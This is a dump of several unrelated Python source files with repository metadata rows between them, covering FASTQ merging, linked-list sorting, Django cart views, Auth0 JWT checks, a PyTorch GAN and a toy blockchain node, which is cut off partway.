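# The sample name is everything in the fastq filename before the first "_S"
# (e.g. the Illumina _S<n> sample-number suffix).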
for i, run in enumerate(inputDirectories):
samplePaths = glob.glob(os.path.join(run, 'melanoma-*'))
for j in samplePaths:
fastqFiles_R1 = sorted(glob.glob(os.path.join(j, '*_R1_*.fastq.gz')))
fastqFiles_R2 = sorted(glob.glob(os.path.join(j, '*_R2_*.fastq.gz')))
sampleName = sampleNameRegex.search(os.path.basename(fastqFiles_R1[0])).group()
sampleOutDir = os.path.join(args.outDir, sampleName)
if not os.path.exists(sampleOutDir):
os.makedirs(sampleOutDir)
sampleOutFile_R1 = os.path.join(sampleOutDir, sampleName + '_R1.fastq.gz')
sampleOutFile_R2 = os.path.join(sampleOutDir, sampleName + '_R2.fastq.gz')
if i == 0:
print sampleOutFile_R1
with open(sampleOutFile_R1, 'w') as out_R1:
for k1 in fastqFiles_R1:
print k1
shutil.copyfileobj(open(k1, 'r'), out_R1)
print sampleOutFile_R2
with open(sampleOutFile_R2, 'w') as out_R2:
for k2 in fastqFiles_R2:
print k2
shutil.copyfileobj(open(k2, 'r'), out_R2)
elif i > 0:
print sampleOutFile_R1
with open(sampleOutFile_R1, 'a') as out_R1:
for k1 in fastqFiles_R1:
print k1
shutil.copyfileobj(open(k1, 'r'), out_R1)
print sampleOutFile_R2
with open(sampleOutFile_R2, 'a') as out_R2:
for k2 in fastqFiles_R2:
print k2
shutil.copyfileobj(open(k2, 'r'), out_R2)
|
[
"benjamin.emert@gmail.com"
] |
benjamin.emert@gmail.com
|
73906b24af6a13dc6c87fc68d7894a007084672d
|
5cad50399a3bd3634029f03684a3f44e94543aaf
|
/baekjoon/1781.py
|
7ef741edefb69b2b054a0666631cad84077af1bb
|
[] |
no_license
|
didrlgus/algorithm-python
|
021676a09204e9bff70ab4a21ddfa020e809028b
|
f39707d308ad4b055f515f995fa904ec71185193
|
refs/heads/master
| 2023-06-27T15:03:54.840375
| 2021-07-31T06:52:37
| 2021-07-31T06:52:37
| 359,126,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
# Cup ramen (Baekjoon 1781)
import heapq
n = int(input())
arr = []
q = []
for _ in range(n):
a, b = map(int, input().split())
arr.append((a,b))
arr.sort()
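# Greedy with a min-heap: scan items in deadline order, keep the most
# profitable ones, and pop the cheapest whenever more items are kept than the
# current deadline allows.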
for el in arr:
dead_line = el[0]
heapq.heappush(q, el[1])
if len(q) > dead_line:
heapq.heappop(q)
print(sum(q))
|
[
"rlgusdid@naver.com"
] |
rlgusdid@naver.com
|
1d3c99b61385bfd04ca91eb103455f99a6d2cc49
|
b59c3e55d51278640987b1f43073333a082d8ebf
|
/src/SimplePlotreplication.py
|
38144d26d21ba9092a13311ad336460ffe0a5348
|
[] |
no_license
|
rluteijn/SmartGridDiffusion
|
acab499db0d3fdfce8722be1086ca4f75c409bf5
|
1b780c77cb36d5d43942a10bd44891b5fca31f28
|
refs/heads/master
| 2020-12-26T03:12:22.876657
| 2014-07-25T14:15:40
| 2014-07-25T14:15:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,663
|
py
|
'''
Created on 6 mrt. 2013
@author: Andris
'''
'''===========================Plotting lines, KDE, envelopes===================================='''
#from analysis import graphs
import numpy as np
import matplotlib.pyplot as plt
from expWorkbench import ema_logging, load_results
from analysis.plotting import lines, KDE, envelopes
ema_logging.log_to_stderr(level=ema_logging.DEFAULT_LEVEL)
#load the data
experiments, outcomes = load_results(r'Data/200 runs.bz2')
results = (experiments, outcomes)
'''==============================================================================
print out the lines, envelope and KDE
=============================================================================='''
desired__nr_lines = 200
nr_cases = experiments.shape[0]
indices = np.arange(0, nr_cases, nr_cases/desired__nr_lines)
#for key in ['repayment months']:
for key, value in outcomes.items():
ooi_name = key
ooi = outcomes[ooi_name]
ooi = np.reshape(ooi, (ooi.shape[0]*ooi.shape[1], ooi.shape[2]))
temp_outcomes = {ooi_name: ooi}
lines((ooi, temp_outcomes), density=KDE,
show_envelope=True, experiments_to_show=indices,
titles="")
plt.show()
# n = key
# plt.savefig("./pictures/KDE_30_{}.png".format(n), dpi=75)
'''==============================================================================
to print for only selected outomes and group by model:
=============================================================================='''
#for key in ['total revenue Yearly']:
# fig, axes = envelopes(results, outcomes_to_show=key, density=KDE,
# group_by='model', titles="",fill=True)
|
[
"titan946@gmail.com"
] |
titan946@gmail.com
|
efbd0a5281d884e72317ff76eef6217a7b1c635a
|
611b36b4f65de03874daa7c13a0c8260d4c76264
|
/backend/src/auth/auth.py
|
0191a3eb28c7b743ce85a86b3972f91da8be926f
|
[] |
no_license
|
BassamMusaad/Coffee-shop
|
877a17d43fe899f8a70647b10dd60b726bb3c958
|
a2f449ac99b8b23e1bcde08a3783247c77b749ff
|
refs/heads/master
| 2023-01-12T07:06:01.241238
| 2020-11-15T23:10:35
| 2020-11-15T23:10:35
| 313,141,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,772
|
py
|
import json
from flask import request, _request_ctx_stack,abort
from functools import wraps
from jose import jwt
from urllib.request import urlopen
AUTH0_DOMAIN = 'coffee-udacity-api.us.auth0.com'
ALGORITHMS = ['RS256']
API_AUDIENCE = 'coffee-api'
# AuthError Exception
'''
AuthError Exception
A standardized way to communicate auth failure modes
'''
class AuthError(Exception):
def __init__(self, error, status_code):
self.error = error
self.status_code = status_code
# Auth Header
'''
@TODO implement get_token_auth_header() method
it should attempt to get the header from the request
it should raise an AuthError if no header is present
it should attempt to split bearer and the token
it should raise an AuthError if the header is malformed
return the token part of the header
'''
def get_token_auth_header():
auth = request.headers.get('Authorization', None)
if not auth:
raise AuthError({
'code': 'authorization_header_missing',
'description': 'Authorization header is expected.'
}, 401)
parts = auth.split()
if parts[0].lower() != 'bearer':
raise AuthError({
'code': 'invalid_header',
'description': 'Authorization header must start with "Bearer".'
}, 401)
elif len(parts) == 1:
raise AuthError({
'code': 'invalid_header',
'description': 'Token not found.'
}, 401)
elif len(parts) > 2:
raise AuthError({
'code': 'invalid_header',
'description': 'Authorization header must be bearer token.'
}, 401)
token = parts[1]
return token
'''
@TODO implement check_permissions(permission, payload) method
@INPUTS
permission: string permission (i.e. 'post:drink')
payload: decoded jwt payload
it should raise an AuthError if permissions are not included in the payload
!!NOTE check your RBAC settings in Auth0
it should raise an AuthError if the requested permission string is not in the payload permissions array
return true otherwise
'''
def check_permissions(permission, payload):
if 'permissions' not in payload:
raise AuthError({
'code': 'invalid_claims',
'description': 'Permissions not included in JWT.'
}, 400)
if permission not in payload['permissions']:
raise AuthError({
'code': 'unauthorized',
'description': 'Permission not found.'
}, 401)
return True
'''
@TODO implement verify_decode_jwt(token) method
@INPUTS
token: a json web token (string)
it should be an Auth0 token with key id (kid)
it should verify the token using Auth0 /.well-known/jwks.json
it should decode the payload from the token
it should validate the claims
return the decoded payload
!!NOTE urlopen has a common certificate error described here: https://stackoverflow.com/questions/50236117/scraping-ssl-certificate-verify-failed-error-for-http-en-wikipedia-org
'''
def verify_decode_jwt(token):
jsonurl = urlopen(f'https://{AUTH0_DOMAIN}/.well-known/jwks.json')
jwks = json.loads(jsonurl.read())
unverified_header = jwt.get_unverified_header(token)
rsa_key = {}
if 'kid' not in unverified_header:
raise AuthError({
'code': 'invalid_header',
'description': 'Authorization malformed.'
}, 401)
for key in jwks['keys']:
if key['kid'] == unverified_header['kid']:
rsa_key = {
'kty': key['kty'],
'kid': key['kid'],
'use': key['use'],
'n': key['n'],
'e': key['e']
}
if rsa_key:
try:
payload = jwt.decode(
token,
rsa_key,
algorithms=ALGORITHMS,
audience=API_AUDIENCE,
issuer='https://' + AUTH0_DOMAIN + '/'
)
return payload
except jwt.ExpiredSignatureError:
print('ExpiredSignatureError')
raise AuthError({
'code': 'token_expired',
'description': 'Token expired.'
}, 401)
except jwt.JWTClaimsError:
print('JWTClaimsError')
raise AuthError({
'code': 'invalid_claims',
'description': 'Incorrect claims. Please, check the audience and issuer.'
}, 401)
except Exception:
raise AuthError({
'code': 'invalid_header',
'description': 'Unable to parse authentication token.'
}, 400)
raise AuthError({
'code': 'invalid_header',
'description': 'Unable to find the appropriate key.'
}, 400)
'''
@TODO implement @requires_auth(permission) decorator method
@INPUTS
permission: string permission (i.e. 'post:drink')
it should use the get_token_auth_header method to get the token
it should use the verify_decode_jwt method to decode the jwt
it should use the check_permissions method validate claims and check the requested permission
return the decorator which passes the decoded payload to the decorated method
'''
def requires_auth(permission=''):
def requires_auth_decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
token = get_token_auth_header()
try:
payload = verify_decode_jwt(token)
except:
abort(401)
check_permissions(permission, payload)
return f(payload, *args, **kwargs)
return wrapper
return requires_auth_decorator
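# Usage sketch (illustrative only; the route, permission string and `app`
# object below are assumptions, not part of this module):
#
#   @app.route('/drinks')
#   @requires_auth('get:drinks')
#   def get_drinks(payload):
#       # `payload` is the decoded JWT that the decorator passes as the
#       # first argument
#       return jsonify({'success': True, 'drinks': []})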
|
[
"basam3818@gmail.com"
] |
basam3818@gmail.com
|
695febf5554fa63e89c3488835a6ebfee28fb4d5
|
db4bf1696a2f5624618ccb6936718d470b48c5db
|
/sortList.py
|
45f944719edb1ab0e54a17d820432b1d8311650a
|
[] |
no_license
|
HuipengXu/leetcode
|
2a1657aad8d00452bc4e858d76d45db0146d3fbe
|
e2fecd266bfced6208694b19a2d81182b13dacd6
|
refs/heads/master
| 2022-01-24T11:59:55.315146
| 2019-07-21T04:12:30
| 2019-07-21T04:12:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,252
|
py
|
# @Time : 2019/4/9 8:44
# @Author : Xu Huipeng
# @Blog : https://brycexxx.github.io/
import random
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def sortList0(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def quick_sort_c(head, tail):
mid = partition(head, tail)
if mid is None: return
quick_sort_c(head, mid)
quick_sort_c(mid.next, tail)
def partition(head, tail):
if head == tail or head.next == tail: return
node = head
length = 1
while node.next != tail:
node = node.next
length += 1
idx = random.randint(0, length - 1)
i = j = mid = pivot = head
for _ in range(idx):
pivot = pivot.next
pivot.val, node.val = node.val, pivot.val
while i != tail:
if i.val <= node.val:
i.val, j.val = j.val, i.val
mid = j
j = j.next
i = i.next
return mid
quick_sort_c(head, None)
return head
def sortList1(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def quick_sort_c(head, tail):
mid = partition(head, tail)
if mid is None: return
quick_sort_c(head, mid)
quick_sort_c(mid.next, tail)
def partition(head, tail):
if head == tail or head.next == tail: return
pivot, i, j = head.val, head.next, head
while i != tail:
if i.val < pivot:
j = j.next
i.val, j.val = j.val, i.val
i = i.next
head.val, j.val = j.val, head.val
return j
quick_sort_c(head, None)
return head
def sortList2(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def quick_sort_c(parent, head, tail):
mid = partition(parent, head, tail)
if mid is None: return
quick_sort_c(parent, parent.next, mid)
quick_sort_c(mid, mid.next, tail)
def partition(parent, head, tail):
if head == tail or head.next == tail: return
mid = point = old_head = head
flag = False
while point.next != tail:
if point.next.val < head.val:
new_head = point.next
point.next = point.next.next
new_head.next = old_head
old_head = new_head
else:
if not flag:
mid = point
flag = True
point = point.next
parent.next = old_head
return mid
tmp_head = ListNode(-1)
tmp_head.next = head
quick_sort_c(tmp_head, head, None)
return tmp_head.next
    # Accepted from here on; the quicksort versions above all exceed the time limit
def sortList3(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def merge_sort_c(parent, head, tail):
if head == tail or head.next == tail: return
fast = slow = head
while fast != tail:
if fast.next == tail:
break
fast = fast.next.next
slow = slow.next
merge_sort_c(parent, head, slow)
node = parent
while node.next != slow:
node = node.next
merge_sort_c(node, slow, tail)
merge(parent, parent.next, node.next, tail)
def merge(parent, head, mid, tail):
tmp_mid, tmp_parent = mid, parent
while head != tmp_mid and mid != tail:
if head.val < mid.val:
tmp_parent.next = head
tmp_parent = head
head = head.next
else:
tmp_parent.next = mid
tmp_parent = mid
mid = mid.next
if head == tmp_mid:
tmp_parent.next = mid
elif mid == tail:
tmp_parent.next = head
while tmp_parent.next != tmp_mid:
tmp_parent = tmp_parent.next
tmp_parent.next = tail
tmp_head = ListNode(-1)
tmp_head.next = head
merge_sort_c(tmp_head, head, None)
return tmp_head.next
def sortList4(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def merge_sort_c(head):
if head == None: return
if head.next == None: return head
fast = slow = pre = head
while fast != None and fast.next != None:
pre = slow
slow = slow.next
fast = fast.next.next
            # split the list in two
pre.next = None
l = merge_sort_c(head)
r = merge_sort_c(slow)
return merge(l, r)
def merge(l, r):
head = ListNode(-1)
tmp_head = head
while l != None and r != None:
if l.val < r.val:
tmp_head.next = l
tmp_head = l
l = l.next
else:
tmp_head.next = r
tmp_head = r
r = r.next
if l == None:
tmp_head.next = r
else:
tmp_head.next = l
return head.next
return merge_sort_c(head)
    # merge sort with a more concise recursive merge
def sortList5(self, head: ListNode) -> ListNode:
def merge_sort_c(head: ListNode) -> ListNode:
if not head or not head.next: return head
slow = fast = head
prev = None
while fast and fast.next and fast.next:
prev = slow
slow = slow.next
fast = fast.next.next
prev.next = None
l1 = merge_sort_c(head)
l2 = merge_sort_c(slow)
return merge(l1, l2)
def merge(l1: ListNode, l2: ListNode) -> ListNode:
if not l1: return l2
if not l2: return l1
if l1.val < l2.val:
l1.next = merge(l1.next, l2)
return l1
else:
l2.next = merge(l1, l2.next)
return l2
return merge_sort_c(head)
    # bottom-up merge sort: O(1) extra space, O(n log n) time
def sortList6(self, head: ListNode) -> ListNode:
def cut(l: ListNode, n: int):
node = l
while n > 1 and node:
node = node.next
n -= 1
if not node: return None
cur = node.next
node.next = None
return cur
def merge(l1: ListNode, l2: ListNode) -> ListNode:
if not l1: return l2
if not l2: return l1
if l1.val < l2.val:
l1.next = merge(l1.next, l2)
return l1
else:
l2.next = merge(l1, l2.next)
return l2
dummy_head = ListNode(-1)
size, length = 1, 0
node = head
dummy_head.next = head
while node:
node = node.next
length += 1
while size < length:
cur = dummy_head.next
tail = dummy_head
while cur:
left = cur
right = cut(left, size)
cur = cut(right, size)
tail.next = merge(left, right)
while tail.next:
tail = tail.next
size *= 2
return dummy_head.next
if __name__ == "__main__":
head = ListNode(4)
node = head
for i in [2, 3, 1, 5]:
node.next = ListNode(i)
node = node.next
s = Solution()
sorted_head = s.sortList3(head)
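    # Added for illustration: walk the returned list to see the sorted values
    # (the sample 4 -> 2 -> 3 -> 1 -> 5 should come back as 1..5 if sortList3
    # behaves as intended).
    values = []
    node = sorted_head
    while node:
        values.append(node.val)
        node = node.next
    print(values)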
|
[
"2531094755@qq.com"
] |
2531094755@qq.com
|
b8125a355008b28b7e64b95b94403ed2f4f096bb
|
9557a8a2e402b2576bbd0fee1a7f7241ec62d66e
|
/ttxs/apps/tt_cart/views.py
|
5dd145c9d231020a65b92f93aaec0d0023bfa0ff
|
[] |
no_license
|
Edmond-Qi/dailyfresh
|
69011fb3711a28b733cc1ab10352cd4631fc53cf
|
15e92fdce40d44543932ed997a01a9d165cb2bda
|
refs/heads/master
| 2021-04-15T15:23:21.010829
| 2018-04-07T15:49:28
| 2018-04-07T15:49:28
| 126,330,982
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,684
|
py
|
import json
from django.shortcuts import render
from django.http import JsonResponse,Http404
from redis import client
from tt_goods.models import GoodsSKU
from django_redis import get_redis_connection
# Create your views here.
def add(request):
    '''
    Add an item to the shopping cart.
    POST is normally used when adding, modifying or deleting data.
    '''
if request.method != 'POST':
return Http404
dict = request.POST
sku_id = dict.get('sku_id')
count = int(dict.get('count', 0))
    # validate the data
    # check that the product exists
if GoodsSKU.objects.filter(id=sku_id).count() <= 0:
return JsonResponse({'status':2})
if count <= 0:
return JsonResponse({'status':3})
if count >= 5:
count = 5
if request.user.is_authenticated():
        # if the user is logged in, store the cart in redis
redis_client = get_redis_connection()
key = 'cart%d' % request.user.id
if redis_client.hexists(key, sku_id):
            # if the sku is already in the cart, add the counts together
count1 = int(redis_client.hget(key, sku_id))
count2 = count
count0 = count1 + count2
if count0 > 5:
count0 = 5
redis_client.hset(key, sku_id, count0)
else:
            # otherwise add it as a new entry
redis_client.hset(key, sku_id, count)
total_count = 0
for v in redis_client.hvals(key):
total_count += int(v)
return JsonResponse({'status': 1, 'total_count': total_count})
else:
        # if the user is not logged in, store the cart in a cookie
        # storage format: a dict of {sku_id: count}
        # build the data
cart_dict = {}
        # read the cookie first; parse it into cart_dict if present, otherwise keep the empty dict
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
if sku_id in cart_dict:
cart_dict[sku_id] += count
if cart_dict[sku_id] > 5:
cart_dict[sku_id] = 5
else:
cart_dict[sku_id] = count
        # compute the total number of items
total_count = 0
for k, v in cart_dict.items():
total_count += v
        # serialize the dict to a string so it can be stored in the cookie
cart_str = json.dumps(cart_dict)
response = JsonResponse({'status': 1, 'total_count':total_count})
response.set_cookie('cart',cart_str,expires=60*60*24*14)
return response
def index(request):
    # look up the products currently in the cart
sku_list = []
if request.user.is_authenticated():
redis_client = get_redis_connection()
key = 'cart%d'%request.user.id
id_list = redis_client.hkeys(key)
for id1 in id_list:
sku = GoodsSKU.objects.get(pk=id1)
sku.count = int(redis_client.hget(key, id1))
sku_list.append(sku)
else:
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
for k, v in cart_dict.items():
sku = GoodsSKU.objects.get(id=k)
sku.count = v
sku_list.append(sku)
context={
'title':'购物车',
'sku_list':sku_list
}
return render(request, 'cart.html', context)
def edit(request):
if (request.method != 'POST'):
return Http404
dict = request.POST
sku_id = dict.get('sku_id',0)
count = int(dict.get('count',0))
    # validate the data
    # check that the product exists
if GoodsSKU.objects.filter(pk=sku_id).count() <= 0:
return JsonResponse({'status':2})
    # check that the count is a valid number
try:
count = int(count)
except:
return JsonResponse({'status':3})
print(count)
    # clamp the count to between 1 and 5
if count <= 0:
count = 1
elif count >= 5:
count = 5
response = JsonResponse({'status': 1})
    # update the quantity in the cart
if request.user.is_authenticated():
        # if the user is logged in, update redis
redis_client = get_redis_connection()
key = 'cart%d'%request.user.id
if redis_client.hexists(key,sku_id):
redis_client.hset(key, sku_id, count)
else:
        # if not logged in, update the cookie
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
            # update the quantity
cart_dict[sku_id] = count
cart_str = json.dumps(cart_dict)
response.set_cookie('cart', cart_str, expires=60*60*24*14)
return response
def delete(request):
if (request.method != 'POST'):
return Http404
dict = request.POST
sku_id = dict.get('sku_id',0)
    # validate the data
    # check that the product exists
if GoodsSKU.objects.filter(pk=sku_id).count() <= 0:
return JsonResponse({'status':2})
response = JsonResponse({'status': 1})
    # remove the item from the cart
if request.user.is_authenticated():
        # if the user is logged in, update redis
redis_client = get_redis_connection()
key = 'cart%d'%request.user.id
if redis_client.hexists(key,sku_id):
            # hdel removes a single field from the user's cart hash; delete() would drop whole keys
            redis_client.hdel(key, sku_id)
else:
        # if not logged in, update the cookie
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
            # remove the sku from the dict
cart_dict.pop(sku_id)
cart_str = json.dumps(cart_dict)
response.set_cookie('cart', cart_str, expires=60*60*24*14)
return response
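# Illustrative note (not part of the original views): the cart cookie written
# above is simply the JSON dump of a {sku_id: count} mapping, e.g.
#   json.dumps({'3': 2, '7': 1})
# while the redis layout is one hash per user (key 'cart<user_id>') whose
# fields are sku ids and whose values are counts.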
|
[
"baofengqi@foxmail.com"
] |
baofengqi@foxmail.com
|
e0926c7d612dd71cdb9cb6b25e9445d574869477
|
4e6f299f24fe861fea162ec7da911e2ec734dadf
|
/build/lib/colourgan/networks.py
|
6c09ac9aff2381b63b0119abf92e5bbf4ecb8681
|
[
"MIT"
] |
permissive
|
narenderkumarnain/ColourGAN
|
e4890df979e21a141e57f6746ad9b63019f07810
|
846622dfe037de0782613278241256ac7c784af4
|
refs/heads/master
| 2023-06-27T04:02:57.115816
| 2021-07-25T13:18:38
| 2021-07-25T13:18:38
| 380,448,770
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,370
|
py
|
'''Generator and Discriminator for GAN.'''
import torch
import torch.nn.functional as F
import torch.nn as nn
#Generator for the GAN
class Generator(nn.Module):
'''Generator Module for GAN.'''
def __init__(self , normalization = None):
super(Generator , self).__init__()
# downsampling layers
self.d1 = ConvolutionBlock(1 , 64 ,
normalization = normalization ,
kernel_size = 4 ,
stride = 1 ,
padding = 0 ,
dropout = None
)
self.d2 = ConvolutionBlock(64, 128,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d3 = ConvolutionBlock(128, 256,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d4 = ConvolutionBlock(256, 512,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d5 = ConvolutionBlock(512, 512,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
# upsampling layers
self.u1 = TransposeConvolutionBlock(512 ,512 ,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.u2 = TransposeConvolutionBlock(1024, 256,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.u3 = TransposeConvolutionBlock(512, 128,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.u4 = TransposeConvolutionBlock(256, 64,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.final_layer = ConvolutionBlock(128 , 2 ,
normalization = None,
kernel_size=1,
stride=1,
padding=0,
dropout=None,
activation_function=nn.Tanh()
)
def forward(self , x):
'''Forward Method for Generator.'''
x = F.interpolate(x, size=(35,35),mode='bilinear',align_corners=True)
# print(f'Initial: {x.shape}')
# downsampling layers
d1 = self.d1(x)
d2 = self.d2(d1)
d3 = self.d3(d2)
d4 = self.d4(d3)
d5 = self.d5(d4)
# print(f'Shape d1: {d1.shape}')
# print(f'Shape d2: {d2.shape}')
# print(f'Shape d3: {d3.shape}')
# print(f'Shape d4: {d4.shape}')
# print(f'Shape d5: {d5.shape}')
# upsampling layers with U Net Structure
u1 = self.u1(d5,d4)
u2 = self.u2(u1,d3)
u3 = self.u3(u2,d2)
u4 = self.u4(u3,d1)
# print(f'Shape u1: {u1.shape}')
# print(f'Shape u2: {u2.shape}')
# print(f'Shape u3: {u3.shape}')
# print(f'Shape u4: {u4.shape}')
final = self.final_layer(u4)
# print(f'Final: {final.shape}')
return final
# Discriminator Module for GAN
class Discriminator(nn.Module):
'''Discriminator Module for GAN.'''
def __init__(self,
normalization=None):
super(Discriminator , self).__init__()
# downsampling layers
        # similar to the downsampling layers in the Generator
self.d1 = ConvolutionBlock(3, 64,
normalization=normalization,
kernel_size=4,
stride=1,
padding=0,
dropout=None
)
self.d2 = ConvolutionBlock(64, 128,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d3 = ConvolutionBlock(128, 256,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d4 = ConvolutionBlock(256, 512,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.final_layer = ConvolutionBlock(512,1,
normalization=None,
kernel_size=4,
stride=1,
padding=0,
dropout=None,
activation_function=nn.Sigmoid()
)
def forward(self,x):
'''Forward method for Discriminator Module.'''
x = F.interpolate(x,size=(35,35), mode='bilinear', align_corners=True)
d1 = self.d1(x)
d2 = self.d2(d1)
d3 = self.d3(d2)
d4 = self.d4(d3)
# print(f'Shape d1: {d1.shape}')
# print(f'Shape d2: {d2.shape}')
# print(f'Shape d3: {d3.shape}')
# print(f'Shape d4: {d4.shape}')
final_out = self.final_layer(d4)
# print(f'Final intial: {final_out.shape}')
final_out = final_out.view(x.size()[0],-1)
# print(f'Final final: {final_out.shape}')
return final_out
# Convolution Layer Block for Downsampling Operation
class ConvolutionBlock(nn.Module):
'''Class for Convolution Blocks for Downsampling.'''
def __init__(self , input_channel , output_channel ,
normalization = None,
kernel_size = 4,
stride = 2,
padding = 1,
dropout = None,
activation_function = nn.ReLU() ):
super(ConvolutionBlock , self).__init__()
model_layers = []
# Appending the Main Convolution Layer
model_layers.append(
nn.Conv2d(input_channel , output_channel ,
kernel_size = kernel_size ,
stride = stride ,
padding = padding)
)
#Applying Normalization Layer
if normalization is not None:
if normalization == 'Batch':
model_layers.append(
nn.BatchNorm2d(output_channel)
)
elif normalization == 'Instance':
model_layers.append(
nn.InstanceNorm2d(output_channel)
)
# Appending Activation Function given in the input
model_layers.append(activation_function)
# If Dropout is applicable
if dropout is not None:
model_layers.append(
nn.Dropout(dropout)
)
# Making the Sequential Model
model = nn.Sequential(*model_layers)
self.model = model
def forward(self , x):
'''Forward Operation for Convolution Layer'''
return self.model(x)
# Transpose Convolution block for Upsampling Operation
class TransposeConvolutionBlock(nn.Module):
'''Transpose Convolution Block for Upsampling Architecture.'''
def __init__(self, input_channel, output_channel,
normalization=None,
kernel_size=4,
stride=2,
padding=1,
dropout=None,
activation_function=nn.ReLU()):
super(TransposeConvolutionBlock , self).__init__()
model_layers = []
# Adding the Transpose Convolution Layer
model_layers.append(
nn.ConvTranspose2d(input_channel , output_channel ,
kernel_size = kernel_size ,
stride = stride ,
padding = padding)
)
# adding normalization
if normalization is not None:
if normalization == 'Batch':
model_layers.append(
nn.BatchNorm2d(output_channel)
)
elif normalization == 'Instance':
model_layers.append(
nn.InstanceNorm2d(output_channel)
)
# adding activation function for the layer
model_layers.append(
activation_function
)
# adding dropout
if dropout is not None:
model_layers.append(
nn.Dropout(dropout)
)
# creating the sequential model
model = nn.Sequential(*model_layers)
self.model = model
def forward(self , x1 , skip_input):
'''Forward Method for the input.'''
x = self.model(x1)
return torch.cat((x , skip_input) , 1)
# # Testing
# if __name__=='__main__':
# gen = Discriminator()
# sample_input = torch.zeros((1,1,32,32))
# print(sample_input.shape)
# print(gen)
# print(gen(sample_input))
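# Illustrative smoke test (an assumption about intended usage, mirroring the
# commented block above): the Generator expects a 1-channel input while the
# Discriminator expects a 3-channel input.
if __name__ == '__main__':
    g, d = Generator(), Discriminator()
    fake_ab = g(torch.zeros((1, 1, 32, 32)))   # predicted 2-channel output
    score = d(torch.zeros((1, 3, 32, 32)))     # per-image real/fake score
    print(fake_ab.shape, score.shape)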
|
[
"narender.nain@siemens.com"
] |
narender.nain@siemens.com
|
1cc3ca676af44460a5e873263e4e289b22d460e9
|
28a462a28f443c285ca5efec181ebe36b147c167
|
/tests/compile/basic/es2017/IsWordChar.spec
|
3368377b8c1ab894dee23121519bfc6541f17fed
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
kaist-plrg/jstar
|
63e71f9156860dc21cccc33a9f6c638dfee448ea
|
1282919127ea18a7e40c7a55e63a1ddaaf7d9db4
|
refs/heads/main
| 2022-07-22T08:12:34.947712
| 2022-02-27T04:19:33
| 2022-02-27T11:06:14
| 384,045,526
| 6
| 4
|
NOASSERTION
| 2022-02-27T11:05:26
| 2021-07-08T07:53:21
|
Python
|
UTF-8
|
Python
| false
| false
| 277
|
spec
|
1. If _e_ is -1 or _e_ is _InputLength_, return *false*.
1. Let _c_ be the character _Input_[_e_].
1. Let _wordChars_ be the result of ! WordCharacters().
1. If _c_ is in _wordChars_, return *true*.
1. Return *false*.
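A rough Python sketch of the same steps (illustrative only; `Input`, `InputLength`
and the `WordCharacters()` result are assumed to be supplied by the surrounding
matcher state):
    def is_word_char(e, Input, InputLength, word_chars):
        if e == -1 or e == InputLength:
            return False
        return Input[e] in word_chars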
|
[
"h2oche22@gmail.com"
] |
h2oche22@gmail.com
|
aefa00c38430a003627bd4400aa0e86e606c81ba
|
46823239ca0a88ecabb7418a35f0e4a89097d82a
|
/hadcoin_node_5003.py
|
de830a99c6bd586145c770f1243b8325c42056f5
|
[] |
no_license
|
dsouzaAnush/Blockchain
|
c3c55418d0902b0f1e8717d3dd305b4d8f485f3a
|
dd2a8eaf07c9e8db98993e06131e76a08361c3f6
|
refs/heads/master
| 2020-03-27T01:25:46.330857
| 2018-08-26T17:39:44
| 2018-08-26T17:39:44
| 145,709,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,229
|
py
|
# -*- coding: utf-8 -*-
#Creates a cryptocurrency
import datetime
import hashlib
import json
from flask import Flask, jsonify, request
import requests
from uuid import uuid4
from urllib.parse import urlparse
# Part 1 : build a blockchain
class Blockchain:
def __init__(self):
self.chain = []
self.transactions = []#list of transactions for every block
self.create_block(proof = 1, previous_hash = '0')
self.nodes = set()
def create_block(self, proof, previous_hash):
block = {'index': len(self.chain) + 1,
'timestamp': str(datetime.datetime.now()),
'proof': proof,
'previous_hash': previous_hash,
'transactions': self.transactions}
        self.transactions = []  # reset: these transactions are now recorded in the new block
self.chain.append(block)
return block
def get_previous_block(self):
return self.chain[-1]
def proof_of_work(self, previous_proof):
new_proof = 1
check_proof = False
while check_proof is False:
hash_operation = hashlib.sha256(str(new_proof**2 - previous_proof**2).encode()).hexdigest()
if hash_operation[:4] == '0000':
check_proof = True
else:
new_proof += 1
return new_proof
def hash(self, block):
encoded_block = json.dumps(block, sort_keys = True).encode()
return hashlib.sha256(encoded_block).hexdigest()
def is_chain_valid(self, chain):
previous_block = chain[0]
block_index = 1
while block_index < len(chain):
block = chain[block_index]
if block['previous_hash'] != self.hash(previous_block):
return False
previous_proof = previous_block['proof']
proof = block['proof']
